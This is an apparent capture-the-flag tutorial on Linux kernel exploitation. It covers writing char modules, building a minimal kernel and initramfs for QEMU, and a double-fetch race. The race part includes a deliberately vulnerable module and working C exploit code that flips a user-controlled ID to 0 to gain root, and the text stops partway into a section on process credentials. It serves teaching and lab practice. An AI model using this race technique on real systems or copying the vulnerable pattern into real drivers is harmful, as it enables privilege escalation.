
Kernel

Heavily beta

Introduction

The kernel is the program at the heart of the Operating System. It is responsible for controlling every aspect of the computer, from the handling of syscalls to the integration between software and hardware. As such, exploiting a bug in the kernel can have incredibly dangerous consequences.

In the context of CTFs, Linux kernel exploitation often involves the exploitation of kernel modules. This is an integral feature of Linux that allows users to extend the kernel with their own code, adding additional features.

You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow, and I recommend it highly.

Kernel Modules

Kernel Modules are written in C and compiled to a .ko (Kernel Object) format. Most kernel modules are compiled for a specific kernel version (which can be checked with uname -r; my Xenial Xerus is 4.15.0-128-generic). We can load and unload these modules using the insmod and rmmod commands respectively. Kernel modules are often exposed to userspace through files under /dev/ or /proc/. There are 3 main module types: Char, Block and Network.

Char Modules

Char Modules are deceptively simple. Essentially, you can access them as a stream of bytes - just like a file - using syscalls such as open. In this way, they behave almost like dynamic files (at a super basic level), as the values read and written can change.

Examples of Char modules include /dev/random.
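To make the "stream of bytes" idea concrete, here is a minimal userspace sketch that opens a char device and reads from it exactly as it would from a regular file. The helper name read_device is made up for illustration, and /dev/urandom is only suggested because it exists on practically every Linux system.

```c
#include <fcntl.h>
#include <stddef.h>
#include <unistd.h>

/* Hypothetical helper: read up to `len` bytes from the char device at `path`.
 * Returns the number of bytes read, or -1 if the device could not be opened or read. */
ssize_t read_device(const char *path, void *buf, size_t len) {
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;

    /* read() on a char device is dispatched to the driver's read handler */
    ssize_t n = read(fd, buf, len);
    close(fd);
    return n;
}
```

Calling read_device("/dev/urandom", buf, 16) from main should fill buf with 16 bytes produced by the driver rather than by anything stored on disk.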

I'll be using the terms module and device interchangeably. Strictly speaking, the module is the code loaded into the kernel and the device is the interface it exposes, but for our purposes the distinction rarely matters.

Writing a Char Module

The Code

Writing a Char Module is surprisingly simple. First, we specify what happens on init (loading of the module) and exit (unloading of the module). We need some special headers for this.

#include <linux/init.h>
#include <linux/module.h>

MODULE_LICENSE("Mine!");

static int intro_init(void) {
    printk(KERN_ALERT "Custom Module Started!\n");
    return 0;
}

static void intro_exit(void) {
    printk(KERN_ALERT "Custom Module Stopped :(\n");
}

module_init(intro_init);
module_exit(intro_exit);

It looks simple, because it is simple. For now, anyway.

First we set the license, because otherwise we get a warning, and I hate warnings. Next we tell the module what to do on load (intro_init()) and unload (intro_exit()). Note that we declare the parameters as void, because kernel modules are very picky about requiring parameters (even if just void).

We then register the purposes of the functions using module_init() and module_exit().

Note that we use printk rather than printf. GLIBC doesn't exist in kernel mode, so instead we use the kernel's own logging function. KERN_ALERT specifies the type (log level) of the message sent, and there are many more types.

Compiling

Compiling a Kernel Object can seem a little more complex as we use a Makefile, but it's surprisingly simple:

obj-m += intro.o
 
all:
	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

$(MAKE) is a special variable that expands to the make program currently running, and a sub-make started through it inherits the flags that our Makefile was called with. So, for example, if we call

$ make -j 8

Then the make started by $(MAKE) will also run with -j 8. Essentially, $(MAKE) is make, which compiles the module. The files produced are defined at the top as obj-m. Note that compilation is specific to each kernel, which is why the compiling process uses the build directory of your running kernel.

Using the Kernel Module

Now we've got a ko file compiled, we can add it to the list of active modules:

$ sudo insmod intro.ko

If it's successful, there will be no response. But where did it print to?

Remember, the module runs in the kernel, not in userspace; it does not know you ran it, nor does it communicate with your terminal. Instead, printk writes to the kernel log, and we can check the output using sudo dmesg.

$ sudo dmesg | tail -n 1
[ 3645.657331] Custom Module Started!

Here we grab the last line using tail - as you can see, our printk is called!

Now let's unload the module:

$ sudo rmmod intro
$ sudo dmesg | tail -n 1
[ 4046.904898] Custom Module Stopped :(

And there our intro_exit is called.

You can view currently loaded modules using the lsmod command.
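lsmod gets its information from /proc/modules, so a program can make the same check itself. The sketch below assumes the usual layout of that file, where every line begins with the module name followed by a space; module_listed is a hypothetical helper name.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: scan a /proc/modules-style stream for a module called `name`.
 * Returns 1 if a line starts with `name` followed by a space, 0 otherwise. */
int module_listed(FILE *modules, const char *name) {
    char line[512];
    size_t name_len = strlen(name);
    int at_line_start = 1;

    while (fgets(line, sizeof(line), modules)) {
        /* only compare at the start of a real line, not in the middle of a long one */
        if (at_line_start && strncmp(line, name, name_len) == 0 && line[name_len] == ' ')
            return 1;
        at_line_start = (strchr(line, '\n') != NULL);
    }
    return 0;
}
```

Passing it the result of fopen("/proc/modules", "r") and the name intro should report whether the module from this section is currently loaded.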

An Interactive Char Driver

Creating an interactive char driver is surprisingly simple, but there are a few traps along the way.

Exposing it to the File System

This is by far the hardest part to understand, but honestly a full understanding isn't really necessary. The new intro_init function looks like this:

A major number is essentially the unique identifier to the kernel module. You can specify it using the first parameter of register_chrdev, but if you pass 0 it is automatically assigned an unused major number.
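Major numbers are visible from userspace too: every device node records the major and minor number it is bound to. As a small sketch, the hypothetical helper below uses stat() together with the major() and minor() macros to read them back from a path.

```c
#include <sys/stat.h>
#include <sys/sysmacros.h>
#include <sys/types.h>

/* Hypothetical helper: look up the major and minor numbers of a char device node.
 * Returns 0 on success, -1 if `path` is missing or is not a char device. */
int char_device_numbers(const char *path, unsigned int *major_out, unsigned int *minor_out) {
    struct stat st;

    if (stat(path, &st) != 0 || !S_ISCHR(st.st_mode))
        return -1;

    /* st_rdev holds the device ID that the node refers to */
    *major_out = major(st.st_rdev);
    *minor_out = minor(st.st_rdev);
    return 0;
}
```

On Linux, /dev/null is major 1, minor 3, which makes it a convenient sanity check before pointing the helper at a custom device.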

We then have to register the class and the device. In complete honesty, I don't quite understand what they do, but this code exposes the module to /dev/intro.

Note that on an error it calls class_destroy and unregister_chrdev:

Cleaning it Up

These additional classes and devices have to be cleaned up in the intro_exit function, and we mark the major number as available:

Controlling I/O

In intro_init, the first line may have been confusing:

The third parameter fops is where all the magic happens, allowing us to create handlers for operations such as read and write. A really simple one would look something like:

The parameters to intro_read may be a bit confusing, but the 2nd and 3rd ones line up to the 2nd and 3rd parameters for the read() function itself:

We then use the function copy_to_user to write QWERTY to the buffer passed in as a parameter!

Full Code
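A minimal sketch of how the pieces described above could fit together. The device and class names, the length clamp in intro_read and the version check are my assumptions rather than fixed requirements. Note that the license is set to GPL here, because class_create() and device_create() are only exported to GPL-compatible modules, and class_create() dropped its module argument in kernel 6.4.

```c
#include <linux/device.h>
#include <linux/err.h>
#include <linux/fs.h>
#include <linux/init.h>
#include <linux/module.h>
#include <linux/uaccess.h>
#include <linux/version.h>

#define DEVICE_NAME "intro"   /* assumed: the node appears as /dev/intro */
#define CLASS_NAME  "intro"   /* assumed class name */

MODULE_LICENSE("GPL");

static int major;
static struct class *intro_class;

/* read handler: copies QWERTY into the userspace buffer */
static ssize_t intro_read(struct file *filp, char __user *buf, size_t len, loff_t *off) {
    static const char msg[] = "QWERTY";
    size_t n = len < sizeof(msg) ? len : sizeof(msg);

    if (copy_to_user(buf, msg, n))
        return -EFAULT;
    return n;
}

static const struct file_operations fops = {
    .owner = THIS_MODULE,
    .read  = intro_read,
};

static int __init intro_init(void) {
    struct device *dev;

    /* passing 0 asks the kernel for an unused major number */
    major = register_chrdev(0, DEVICE_NAME, &fops);
    if (major < 0)
        return major;

#if LINUX_VERSION_CODE >= KERNEL_VERSION(6, 4, 0)
    intro_class = class_create(CLASS_NAME);
#else
    intro_class = class_create(THIS_MODULE, CLASS_NAME);
#endif
    if (IS_ERR(intro_class)) {
        unregister_chrdev(major, DEVICE_NAME);
        return PTR_ERR(intro_class);
    }

    /* creating the device is what makes /dev/intro appear */
    dev = device_create(intro_class, NULL, MKDEV(major, 0), NULL, DEVICE_NAME);
    if (IS_ERR(dev)) {
        class_destroy(intro_class);
        unregister_chrdev(major, DEVICE_NAME);
        return PTR_ERR(dev);
    }

    printk(KERN_INFO "intro: registered with major number %d\n", major);
    return 0;
}

static void __exit intro_exit(void) {
    /* undo everything in reverse order */
    device_destroy(intro_class, MKDEV(major, 0));
    class_destroy(intro_class);
    unregister_chrdev(major, DEVICE_NAME);
}

module_init(intro_init);
module_exit(intro_exit);
```

It builds with the same Makefile as before, as long as obj-m names the source file.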

Testing The Module

Create a really basic exploit.c:

If the module is successfully loaded, the read() call should read QWERTY into buffer:

Success!

Interactivity with IOCTL

A more useful way to interact with the driver

Linux contains a syscall called ioctl, which is often used to communicate with a driver. ioctl() takes three parameters:

File Descriptor fd
an unsigned int
an unsigned long

The driver can be adapted to make the latter two virtually anything - perhaps a pointer to a struct or a string. In the driver source, the code looks along the lines of:

But if you want, you can interpret cmd and arg as pointers if that is how you wish your driver to work.

To communicate with the driver in this case, you would use the ioctl() function, which you can import in C:
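The three-argument call shape can be tried without a custom driver. As a sketch, the hypothetical helper below issues the standard FIONREAD request on a pipe: the file descriptor selects the driver, the request code says what we want, and the last argument is a pointer that the kernel fills in.

```c
#include <stddef.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Hypothetical demo: write `len` bytes into a fresh pipe, then use ioctl()
 * to ask how many bytes are waiting on the read end.
 * Returns that count, or -1 on any failure. */
int pending_after_write(const char *data, size_t len) {
    int fds[2];
    int count = -1;

    if (pipe(fds) != 0)
        return -1;

    /* fd, request code, then an argument the kernel interprets as a pointer */
    if (write(fds[1], data, len) != (ssize_t)len || ioctl(fds[0], FIONREAD, &count) < 0)
        count = -1;

    close(fds[0]);
    close(fds[1]);
    return count;
}
```

A custom driver works the same way from the caller's side; only the request codes and the meaning of the third argument are defined by the module instead.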

And you would have to update the file_operations struct:

A Basic Kernel Interaction Challenge

The Module

We're going to create a really basic authentication module that allows you to read the flag if you input the correct password. Here is the relevant code:

If we attempt to read() from the device, it checks the authenticated flag to see if it can return us the flag. If not, it sends back FAIL: Not Authenticated!.

In order to update authenticated, we have to write() to the kernel module. What we attempt to write is compared to p4ssw0rd. If it's not equal, nothing happens. If it is, authenticated is updated and the next time we read() it'll return the flag!

Interacting

Let's first try and interact with the kernel by reading from it.

Make sure you sudo chmod 666 /dev/authentication!

We'll start by opening the device and reading from it.

Note that in the module source code, the length of read() is completely disregarded, so we could make it any number at all! Try switching it to 1 and you'll see.

After compiling, we get that we are not authenticated:

Epic! Let's write the correct password to the device then try again. It's really important to send the null byte here! That's because copy_from_user() does not automatically add it, so the strcmp will fail otherwise!
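The effect of the missing null byte can be reproduced in userspace. This is only a model, assuming the module copies the input into a buffer that still holds old data: memcpy stands in for copy_from_user(), and would_authenticate is a made-up name.

```c
#include <string.h>

#define PASSWORD "p4ssw0rd"

/* Userspace model of the comparison: `count` bytes arrive in a buffer that still
 * holds stale data, as a kernel buffer might after copy_from_user().
 * Returns 1 if the comparison would authenticate, 0 otherwise. */
int would_authenticate(const char *input, size_t count) {
    char kbuf[32];

    memset(kbuf, 'A', sizeof(kbuf));    /* stale contents, not zeroes */
    kbuf[sizeof(kbuf) - 1] = '\0';      /* keeps this model well-defined */

    if (count > sizeof(kbuf) - 1)
        count = sizeof(kbuf) - 1;
    memcpy(kbuf, input, count);         /* stands in for copy_from_user() */

    return strcmp(kbuf, PASSWORD) == 0;
}
```

Sending 8 bytes leaves the password immediately followed by stale bytes, so strcmp sees a longer string and fails; sending 9 bytes includes the terminator and the comparison succeeds.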

It works!

Amazing! Now for something really important:

The state is preserved between connections! Because the kernel module remains on, you will be authenticated until the module is reloaded (either via rmmod then insmod, or a system restart).

Final Code

Challenge - IOCTL

So, here's your challenge! Write the same kernel module, but using ioctl instead. Then write a program to interact with it and perform the same operations. ZIP file including both below, but no cheating! This is really good practice.

Compiling, Customising and booting the Kernel

Instructions for compiling the kernel with your own settings, as well as compiling kernel modules for a specific kernel version.

This isn't necessary for learning how to write kernel exploits - all the important parts will be provided! This is just to help those hoping to write challenges of their own, or perhaps set up their own VMs for learning purposes.

Prerequisites

$ apt-get install flex bison libelf-dev

There may be other requirements, I just already had them. Check here for the full list.

The Kernel

Cloning

git clone https://github.com/torvalds/linux --depth=1

Use --depth 1 to only get the last commit.

Customise

Remove the current compilation configuration, as it is more complex than we need:

$ cd linux
$ rm -f .config

Now we can create a minimal configuration, with almost all options disabled. A .config file is generated with the least features and drivers possible.

$ make allnoconfig
  YACC    scripts/kconfig/parser.tab.[ch]
  HOSTCC  scripts/kconfig/lexer.lex.o
  HOSTCC  scripts/kconfig/menu.o
  HOSTCC  scripts/kconfig/parser.tab.o
  HOSTCC  scripts/kconfig/preprocess.o
  HOSTCC  scripts/kconfig/symbol.o
  HOSTCC  scripts/kconfig/util.o
  HOSTLD  scripts/kconfig/conf
#
# configuration written to .config
#

We create a kconfig file with the options we want to enable. An example is the following:

CONFIG_64BIT=y
CONFIG_SMP=y
CONFIG_PRINTK=y
CONFIG_PRINTK_TIME=y

CONFIG_PCI=y

# We use an initramfs for busybox with elf binaries in it.
CONFIG_BLK_DEV_INITRD=y
CONFIG_RD_GZIP=y
CONFIG_BINFMT_ELF=y
CONFIG_BINFMT_SCRIPT=y

# This is for /dev file system.
CONFIG_DEVTMPFS=y

# For the power-down button (triggered by qemu's `system_powerdown` command).
CONFIG_INPUT=y
CONFIG_INPUT_EVDEV=y
CONFIG_INPUT_KEYBOARD=y

CONFIG_MODULES=y

CONFIG_KPROBES=n
CONFIG_LTO_NONE=y
CONFIG_SERIAL_8250=y
CONFIG_SERIAL_8250_CONSOLE=y
CONFIG_EMBEDDED=n
CONFIG_TMPFS=y

CONFIG_RELOCATABLE=y
CONFIG_RANDOMIZE_BASE=y

CONFIG_USERFAULTFD=y

Explanation of Options

CONFIG_64BIT - compiles the kernel for 64-bit
CONFIG_SMP - symmetric multiprocessing; allows the kernel to run on multiple cores
CONFIG_PRINTK, CONFIG_PRINTK_TIME - enables log messages and timestamps
CONFIG_PCI - enables support for the PCI bus
CONFIG_BLK_DEV_INITRD - enables support for loading an initial RAM disk
CONFIG_RD_GZIP - enables support for gzip-compressed initrd images
CONFIG_BINFMT_ELF - enables support for executing ELF binaries
CONFIG_BINFMT_SCRIPT - enables executing scripts with a shebang (#!) line
CONFIG_DEVTMPFS - Enables automatic creation of device nodes in /dev at boot time using devtmpfs
CONFIG_INPUT - enables support for the generic input layer required for input device handling
CONFIG_INPUT_EVDEV - enables support for the event device interface, which provides a unified input event framework
CONFIG_INPUT_KEYBOARD - enables support for keyboards
CONFIG_MODULES - enables support for loading and unloading kernel modules
CONFIG_KPROBES - disables support for kprobes, a kernel-based debugging mechanism. We disable this because ... TODO
CONFIG_LTO_NONE - disables Link Time Optimization (LTO) for kernel compilation. This is to allow better debugging
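CONFIG_SERIAL_8250, CONFIG_SERIAL_8250_CONSOLE - enables the 8250/16550 serial port driver and lets it act as the system console, which console=ttyS0 relies on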
CONFIG_EMBEDDED - disables optimizations/features for embedded systems
CONFIG_TMPFS - enables support for the tmpfs in-memory filesystem
CONFIG_RELOCATABLE - builds a relocatable kernel that can be loaded at different physical addresses
CONFIG_RANDOMIZE_BASE - enables KASLR support
CONFIG_USERFAULTFD - enables support for the userfaultfd system call, which allows handling of page faults in user space

In order to update the minimal .config with these options, we use the provided merge_config.sh script:

$ scripts/kconfig/merge_config.sh .config ../kconfig

Building

$ make -j4

That takes a while, but eventually builds a kernel in arch/x86/boot/bzImage. This is the same bzImage that you get in CTF challenges.

Kernel Modules

When we compile kernel modules for our own kernel, we use the following Makefile structure:

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

To compile it for a different kernel, all we do is change the -C flag to point to the newly-compiled kernel rather than the system's:

all:
	make -C /home/ir0nstone/linux M=$(PWD) modules

The module is now compiled for the specific kernel version!

Booting the Kernel in a Virtual Machine

References

Creating the File System and Executables

We now have a minimal kernel bzImage and a kernel module that is compiled for it. Now we need to create a minimal VM to run it in.

To do this, we use busybox, an executable that contains tiny versions of most Linux executables. This allows us to have all of the required programs, in as little space as possible.

We will download and extract busybox; you can find the latest version here.

$ curl https://busybox.net/downloads/busybox-1.36.1.tar.bz2 | tar xjf -

We also create an output folder for compiled versions.

$ mkdir busybox_compiled

Now compile it statically. We're going to use the menuconfig option, so we can make some choices.

$ cd busybox-1.36.1
$ make O=../busybox_compiled menuconfig

Once the menu loads, hit Enter on Settings. Hit the down arrow key until you reach the option Build static binary (no shared libs). Hit Space to select it, and then Escape twice to leave. Make sure you choose to save the configuration.

Now, make it with the new options

$ cd ../busybox_compiled
$ make -j
$ make install

Now we make the file system.

$ cd ..
$ mkdir initramfs
$ cd initramfs
$ mkdir -pv {bin,dev,sbin,etc,proc,sys/kernel/debug,usr/{bin,sbin},lib,lib64,mnt/root,root}
$ cp -av ../busybox_compiled/_install/* .
$ sudo cp -av /dev/{null,console,tty,sda1} dev/

The last thing missing is the classic init script, which gets run on system load. A provisional one works fine for now:

#!/bin/sh
 
mount -t proc none /proc
mount -t sysfs none /sys
 
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
 
exec /bin/sh

Make it executable

$ chmod +x init

Finally, we're going to bundle it into a cpio archive, which is understood by QEMU.

$ find . -not -name '*.cpio' | cpio -o -H newc > initramfs.cpio

The -not -name '*.cpio' is there to prevent the archive from including itself; the pattern is quoted so that the shell passes it to find unexpanded.
You can even compress the filesystem to a .cpio.gz file, which QEMU also recognises.

If we want to extract the cpio archive (say, during a CTF) we can use this command:

$ cpio -i -F initramfs.cpio

Loading it with QEMU

Put bzImage and initramfs.cpio into the same folder. Write a short run.sh script that loads QEMU:

#!/bin/sh

qemu-system-x86_64 \
    -kernel bzImage \
    -initrd initramfs.cpio \
    -append "console=ttyS0 quiet loglevel=3 oops=panic" \
    -monitor /dev/null \
    -nographic \
    -no-reboot

Explanation of Flags

-kernel bzImage - sets the kernel to be our compiled bzImage
-initrd initramfs.cpio - provide the file system
-append ... - basic features; in the future, this flag is also used to set protections
- console=ttyS0 - Directs kernel messages to the first serial port (ttyS0)
- quiet - Only show critical messages from the kernel
- loglevel=3 - Only show error messages and higher-priority messages
- oops=panic - Make the kernel panic immediately on an oops (kernel error)
-monitor /dev/null - Disable the QEMU monitor
-nographic - Disable GUI, operate in headless mode (faster)
-no-reboot - Do not automatically restart the VM when encountering a problem (useful for debugging and working out why it crashes, as the crash logs will stay).

Once we make this executable and run it, we get loaded into a VM!

User Accounts

Right now, we have a minimal Linux kernel we can boot, but if we try and work out who we are, it doesn't act quite as we expect it to:

~ # whoami
whoami: unknown uid 0

This is because /etc/passwd and /etc/group don't exist, so we can just create those!

/etc/passwd

root:x:0:0:root:/root:/bin/sh
user:x:1000:1000:User:/home/user:/bin/sh

/etc/group

root:x:0:
user:x:1000:

Loading the Kernel Module

The final step is, of course, the loading of the kernel module. I will be using the module from my Double Fetch section for this step.

First, we copy the .ko file to the filesystem root. Then we modify the init script to load it, and also set the UID of the loaded shell to 1000 (so we are not root!).

#!/bin/sh

insmod /double_fetch.ko
mknod /dev/double_fetch c 253 0
chmod 666 /dev/double_fetch

mount -t proc none /proc
mount -t sysfs none /sys

mknod -m 666 /dev/ttyS0 c 4 64

setsid /bin/cttyhack setuidgid 1000 /bin/sh

Here I am assuming that the major number of the double_fetch module is 253.

Why am I doing that?

If we load into a shell and run cat /proc/devices, we can see that double_fetch is loaded with major number 253 every time. I can't find any way to load this in without guessing the major number, so we're sticking with this for now - please get in touch if you find one!
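One way to avoid hard-coding the number is to read it back from /proc/devices once the module is loaded. The sketch below assumes the usual layout of that file (a "Character devices:" section of "major name" lines, followed by a "Block devices:" section); find_char_major is a hypothetical helper name.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: find the major number registered for the char driver `name`
 * in a /proc/devices-style stream. Returns the major number, or -1 if not found. */
int find_char_major(FILE *devices, const char *name) {
    char line[256];
    char driver[64];
    int num;

    while (fgets(line, sizeof(line), devices)) {
        /* char entries come first; stop once the block-device section starts */
        if (strncmp(line, "Block devices:", 14) == 0)
            break;
        if (sscanf(line, "%d %63s", &num, driver) == 2 && strcmp(driver, name) == 0)
            return num;
    }
    return -1;
}
```

A small static binary built around this could print the number for the init script to pass to mknod, provided /proc is mounted before it runs. Alternatively, a module that calls device_create() gets its node created automatically when devtmpfs is mounted on /dev.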

Compiling a Different Kernel Version

If we want to compile a kernel version that is not the latest, we first have to fetch all the tags:

$ git fetch --tags

It takes ages to run, naturally. Once we do that, we can check out a specific version of choice:

$ git checkout v5.11

We then continue from there.

Some tags seem to not have the correct header files for compilation. Others, weirdly, compile kernels that build, but then never load in QEMU. I'm not quite sure why, to be frank.

Double-Fetch

The most simple of vulnerabilities

A double-fetch vulnerability is when the kernel reads the same piece of userspace data more than once. Because userspace programs will commonly pass parameters in to the kernel as pointers, the data can be modified at any time, including between those reads. If it is modified at the exact right time, an attacker could compromise the execution of the kernel.

A Vulnerable Kernel Module

Let's start with a contrived example, where all we want to do is change the id that the module stores. We are not allowed to set it to 0, as that is the ID of root, but all other values are allowed.

The code below will be the contents of the write() handler of a kernel module. I've removed the boilerplate code mentioned previously, but here are the relevant parts:

#define PASSWORD    "p4ssw0rd"

typedef struct {
    int id;
    char password[10];
} Credentials;

static int id = 1001;

static ssize_t df_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
    Credentials *creds = (Credentials *)buf;

    printk(KERN_INFO "[Double-Fetch] Reading password from user...");

    if (creds->id == 0) {
        printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
        return -1;
    }

    // to increase reliability
    msleep(1000);

    if (!strcmp(creds->password, PASSWORD)) {
        id = creds->id;
        printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
        return id;
    }

    printk(KERN_ALERT "[Double-Fetch] Password incorrect!");
    return -1;
}

The program will:

Check if the ID we are attempting to switch to is 0
- If it is, it doesn't allow us, as we attempted to log in as root
Sleep for 1 second (this is just to illustrate the example better, we will remove it later)
Compare the password to p4ssw0rd
- If it is, it will set the id variable to the id in the creds structure

Simple Communication

Let's say we want to communicate with the module, and we set up a simple C program to do so:

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

typedef struct {
    int id;
    char password[10];
} Credentials;

int main() {
    int fd = open("/dev/double_fetch", O_RDWR);
    printf("FD: %d\n", fd);

    Credentials creds;
    creds.id = 900;
    strcpy(creds.password, "p4ssw0rd");

    int res_id = write(fd, &creds, 0);    // last parameter here makes no difference
    printf("New ID: %d\n", res_id);

    return 0;
}

We compile this statically (as there are no shared libraries on our VM):

gcc -static -o exploit exploit.c

As expected, the id variable gets set to 900 - we can check this in dmesg:

$ dmesg
[...]
[    3.104165] [Double-Fetch] Password correct! ID set to 900

That all works fine.

Exploiting a Double-Fetch and Switching to ID 0

The flaw here is that creds->id is dereferenced twice. What does this mean? The kernel module is passed a reference to a Credentials struct:

Credentials *creds = (Credentials *)buf;

This is a pointer, and that is perhaps the most important thing to remember. When we interact with the module, we give it a specific memory address. This memory address holds the Credentials struct that we define and pass to the module. The kernel does not have a copy - it relies on the user's copy, and goes to userspace memory to use it.

Because this struct is controlled by the user, they have the power to change it whenever they like.

The kernel module uses the id field of the struct on two separate occasions. Firstly, to check that the ID we wish to swap to is valid (not 0):

if (creds->id == 0) {
    printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
    return -1;
}

And once more, to set the id variable:

if (!strcmp(creds->password, PASSWORD)) {
    id = creds->id;
    printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
    return id;
}

Again, this might seem fine - but it's not. What is stopping it from changing in between these two uses? The answer is simple: nothing. That is what differentiates userspace exploitation from kernel space.
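For contrast, this is roughly what a handler that fetches only once looks like. It is a userspace model, not the module's code: the struct copy stands in for a single copy_from_user() into kernel memory, and login_single_fetch is a made-up name.

```c
#include <string.h>

#define PASSWORD "p4ssw0rd"

typedef struct {
    int id;
    char password[10];
} Credentials;

/* Userspace model of a single-fetch handler. `user` plays the role of the
 * userspace pointer; a real module would take the snapshot with copy_from_user().
 * Returns the accepted id, or -1 if the request is rejected. */
int login_single_fetch(const Credentials *user) {
    Credentials local = *user;                             /* the only fetch */

    local.password[sizeof(local.password) - 1] = '\0';     /* never trust the terminator */

    if (local.id == 0)
        return -1;
    if (strcmp(local.password, PASSWORD) != 0)
        return -1;

    return local.id;                                       /* the same value that was checked */
}
```

Because both the check and the assignment use local, changing the original struct afterwards has no effect on the outcome.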

A Proof-of-Concept: Switching to ID 0

In between the two dereferences of creds->id, there is a timeframe. Here, we have artificially extended it (by sleeping for one second). We have a race condition - the aim is to switch id in that timeframe. If we do this successfully, we will pass the initial check (as the ID will start off as 900), but by the time it is copied to id, it will have become 0 and we have bypassed the security check.

Here's the plan, visually, if it helps:

In the waiting period, we swap out the id.

If you are trying to compile your own kernel, you need CONFIG_SMP enabled, because we need to modify it in a different thread! Additionally, you need QEMU to have the flag -smp 2 (or more) to enable 2 cores, though it may default to having multiple even without the flag. This example may work without SMP, but that's because of the sleep - when we move on to part 2, with no sleep, we require multiple cores.

The C program will hang on write until the kernel module returns, so we can't use the main thread.

With that in mind, the "exploit" is fairly self-explanatory - we start another thread, wait 0.3 seconds, and change id!

// gcc -static -o exploit -pthread exploit.c

#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void *switcher(void *arg);

typedef struct {
    int id;
    char password[10];
} Credentials;

int main() {
    // communicate with the module
    int fd = open("/dev/double_fetch", O_RDWR);
    printf("FD: %d\n", fd);

    // use a random ID and set the password correctly
    Credentials creds;
    creds.id = 900;
    strcpy(creds.password, "p4ssw0rd");

    // set up the switcher thread
    // pass it a pointer to `creds`, so it can modify it
    pthread_t thread;

    if (pthread_create(&thread, NULL, switcher, &creds)) {
        fprintf(stderr, "Error creating thread\n");
        return -1;
    }

    // now we write the cred struct to the module
    // it should be swapped after about .3 seconds by switcher
    int res_id = write(fd, &creds, 0);

    // write returns the id we switched to
    // if all goes well, that is 0
    printf("New ID: %d\n", res_id);

    // finish thread cleanly
    if (pthread_join(thread, NULL)) {
        fprintf(stderr, "Error joining thread\n");
        return -1;
    }

    return 0;
}

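void *switcher(void *arg) {
    Credentials *creds = (Credentials *)arg;

    // wait until the module is sleeping - don't want to change it BEFORE the initial ID check!
    // usleep() is used because sleep() takes whole seconds, so sleep(0.3) would not wait at all
    usleep(300000);

    creds->id = 0;
    return NULL;
}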

We have to compile it statically, as the VM has no shared libraries.

$ gcc -static -o exploit -pthread exploit.c

Now we have to somehow get it into the file system. In order to do that, we need to first extract the .cpio archive (you may want to do this in another folder):

$ cpio -i -F initramfs.cpio

Now copy exploit there and make sure it's marked executable. You can then compress the filesystem again:

$ find . -not -name '*.cpio' | cpio -o -H newc > initramfs.cpio

Use the newly-created initramfs.cpio to launch the VM with run.sh. Executing exploit, it is successful!

~ # ./exploit 
FD: 3
New ID: 0

Note that the VM loaded you in as root by default. This is for debugging purposes, as it allows you to use utilities such as dmesg to read the kernel module output and check for errors, as well as a host of other things we will talk about. When testing exploits, it's always helpful to fix the init script to load you in as root! Just don't forget to test it as another user in the end.

Double-Fetch without Sleep

Removing the artificial sleep

Overview

In reality, there won't be a 1-second sleep for your race condition to occur. This means we instead have to hope that it occurs in the assembly instructions between the two dereferences!

This will not work every time - in fact, it's quite likely to not work! - so we will instead have two loops: one that keeps writing 0 to the ID, and another that writes another value - e.g. 900 - and then calls write. The aim is for the thread that switches to 0 to sync up so perfectly that the switch occurs in between the ID check and the ID "assignment".

Analysis

If we check the source, we can see that there is no msleep any longer:

if (creds->id == 0) {
    printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
    return -1;
}

printk("[Double-Fetch] Attempting login...");

if (!strcmp(creds->password, PASSWORD)) {
    id = creds->id;
    printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
    return id;
}

Exploitation

Our exploit is going to look slightly different! We'll create the Credentials struct again and set the ID to 900:

Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");

Then we are going to write this struct to the module repeatedly. We cap the loop at 1,000,000 iterations (effectively infinite for our purposes) so that it is guaranteed to terminate:

// don't want to make the loop infinite, just in case
for (int i = 0; i < 1000000; i++) {
    // now we write the cred struct to the module
    res_id = write(fd, &creds, 0);

    // if res_id is 0, stop the race
    if (!res_id) {
        puts("[+] ID is 0!");
        break;
    }
}

If the ID returned is 0, we won the race! It is really important to keep in mind exactly what the "success" condition is, and how you can check for it.

Now, in the second thread, we will constantly cycle between ID 900 and 0. We do this in the hope that it will be 900 on the first dereference, and 0 on the second! I make this loop infinite because it is a thread, and the thread will be killed when the program is (provided you remove pthread_join()! Otherwise your main thread will wait forever for the second to stop!).

void *switcher(void *arg) {
    volatile Credentials *creds = (volatile Credentials *)arg;

    while (1) {
        creds->id = 0;
        creds->id = 900;
    }
}

If we compile the exploit and run it, we get the desired result:

~ $ ./exploit 
FD: 3
[    2.140099] [Double-Fetch] Attempted to log in as root!
[    2.140099] [Double-Fetch] Attempted to log in as root!
[+] ID is 0!
[-] Finished race

Look how quick that was! Insane - two fails, then a success!

Race Analysis

You might be wondering how tight the race window can be for exploitation - well, gnote from TokyoWesterns CTF 2019 had a race of two assembly instructions:

; note that rbx is the buf argument, user-controlled
cmp dword ptr [rbx], 5
ja default_case
mov eax, [rbx]
mov rax, jump_table[rax*8]
jmp rax

The dereferences [rbx] have just one assembly instruction between, yet we are capable of racing. THAT is just how tight!

The Ultimate Aim of Kernel Exploitation - Process Credentials

Overview

Userspace exploitation often has the end goal of code execution. In the case of kernel exploitation, we already have code execution; our aim is to escalate privileges, so that when we spawn a shell (or do anything else) using execve("/bin/sh", NULL, NULL) we are dropped into it as root.

To understand this, we have to talk a little about how privileges and credentials work in Linux.

The cred struct

The cred struct contains all the permissions a task holds. The ones that we care about are typically these:

struct cred {
	/* ... */
	
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
